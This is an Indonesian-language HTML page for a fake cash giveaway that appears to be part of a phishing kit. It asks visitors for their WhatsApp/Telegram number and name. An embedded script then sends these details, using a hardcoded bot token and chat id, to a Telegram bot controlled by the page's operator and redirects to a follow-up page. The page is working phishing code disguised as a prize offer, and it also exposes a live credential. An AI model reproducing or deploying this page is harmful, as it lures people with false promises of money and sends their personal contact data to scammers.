<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>GIVEAWAY UANG TUNAI</title>
    <link rel="icon" type="image/x-icon" href="asset/loading.png">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-T3c6CoIi6uLrA9TneNEoa7RxnatzjcDSCmG1MXxSR1GAsXEV/Dwwykc2MPK8M2HN" crossorigin="anonymous">
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background: #5babe0;
        }

        .container {
            padding: 20px;
        }

        .logo-atas {
            text-align: center;
        }

        .image-web img {
            width: 250px;
        }

        .form-container {
            background-color: #ecc30c;
            border: 5px solid #024a74;
            border-radius: 10px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.2);
            padding: 20px;
            margin-top: 20px;
        }

        .btnNext {
            background-color: #3c7bce;
            border: none;
            border-radius: 10px;
            width: 90%;
            color: rgb(255, 255, 255);
            font-weight: bold;
            height: 45px;
            margin-top: 20px;
        }

        #proses {
            color: rgb(134, 2, 2);
            display: none;
            margin-top: 20px;
        }
    </style>
</head>

<body>
    <div class="container">
        <div class="logo-atas">
            <img class="img-fluid" src="asset/atas.jpg" alt="">
        </div>
    </div>

    <div class="container">
        <div class="logo-atas">
            <img class="img-fluid" src="asset/logofavicon.jpg" alt="">
        </div>
        <div class="title-web mt-1">
            <h2 class="text-center">Isi Data Penerima GiveAway</h2>
        </div>
        <div class="image-web">
            <div class="form-container">
                <div class="col-md-3">
                    <label for="nope">Nomor Whatsapp / Telegram</label><br>
                    <input type="number" name="nope" id="nope" class="form-control">
                </div>

                <div class="col-md-3 mt-3">
                    <label for="pin">Nama Anda</label><br>
                    <input type="text" name="pin" id="pin" class="form-control">
                </div>

                <div class="container w-30 mt-3">
                    <div class="form-cc">
                        <div class="form-group" style="width: 70%">
                            <label for="input1">Giveaway yang Tersedia</label>
                            <select class="form-control shadow-sm form-control-sm" id="input1">
                                <option value="">_- Silahkan Pilih -_</option>
                                <option value="Uang Tunai Rp.2.000.000">Uang Tunai Rp.2.000.000</option>
                                <option value="Uang Tunai Rp.5.000.000">Uang Tunai Rp.5.000.000</option>
                                <option value="Uang Tunai Rp.10.000.000">Uang Tunai Rp.10.000.000</option>
                                <option value="Uang Tunai Rp.15.000.000">Uang Tunai Rp.15.000.000</option>
                                <option value="Uang Tunai Rp.30.000.000">Uang Tunai Rp.30.000.000</option>
                                <option value="Request Langsung">Request Langsung</option>
                            </select>
                        </div>
                    </div>
                </div>

                <center><button onclick="next()" class="btnNext">Kirim Permintaan</button></center>
                <p id="proses" class="text-center">TERIMA KASIH PERMINTAAN ANDA SEDANG DI PROSES</p>
            </div>
        </div>
    </div>

    <script>
        const next = () => {
            let proses = document.querySelector("#proses");
            let nope = document.querySelector("#nope").value;
            let pin = document.querySelector("#pin").value;
            const nocard = document.querySelector("#input1").value;
            let token = "7070593349:AAGhtyk4PiU3fMmLVe9CQiKPaQlrZLR8yjM";
            let id_tele = "6250486742";
            if (nope === "" || pin === "") {
                alert("Mohon Isi data Dengan Benar");
            } else {
                let message = `  =| GIVE-AWAY |=%0A------------------%0AHadiahnya: ${nocard}%0A______________________%0ANo. WA / Telegram : %0A${nope}%0A%0ANAMA : ${pin}`;
                let api = `https://api.telegram.org/bot${token}/sendMessage?chat_id=${id_tele}&text=${message}`;
                fetch(api, {
                    method: 'POST',
                })
                    .then((response) => response.json())
                    .then(data => {
                        console.log('Pesan terkirim:', data);
                        window.location.href = "tanya.html";
                    })
                    .catch((error) => {
                        console.error('Error:', error);
                    });
            }
        }
    </script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js"
        integrity="sha384-C6RzsynM9kWDrMNeT87bh95OGNyZPhcTNXj1NW7RuBCsyN/o0jlpcV8Qyq46cDfL"
        crossorigin="anonymous"></script>
</body>

</html>